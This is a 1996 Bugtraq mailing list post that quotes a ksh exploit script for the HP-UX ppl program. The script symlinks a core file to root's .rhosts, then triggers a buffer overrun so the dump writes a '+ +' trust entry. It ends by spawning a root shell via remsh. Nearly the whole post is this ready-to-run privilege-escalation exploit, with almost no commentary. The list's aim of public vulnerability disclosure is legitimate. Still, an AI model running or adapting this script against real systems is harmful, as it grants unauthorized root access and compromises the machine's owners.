Bugtraq mailing list archives

Re: Untitled

From: sec () wg camelot de (Stefan Zehl)
Date: Sun, 3 Nov 1996 17:53:13 GMT

In article <199611020927.CAA09747 () command com inter net>, Scriptors of DOOM wrote:
Oh, if I had a hammer, I'd hammer in the morning, I'd hammer in the evening,
and I'd hammer me some Unix scripts.

Here it is, fresh from the Web :)

#!/bin/ksh

# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie

#HOST='localhost'
#USER=`whoami`

HOST="+"
USER="+"

cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=`echo "${AAA}\n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i

CU,
        Sec
--
 Jeder Tag an dem du nicht lächelst, ist ein verlorener Tag. (C. Chaplin)
          Hiroshima '45    Tsjernobyl '86   Windows '95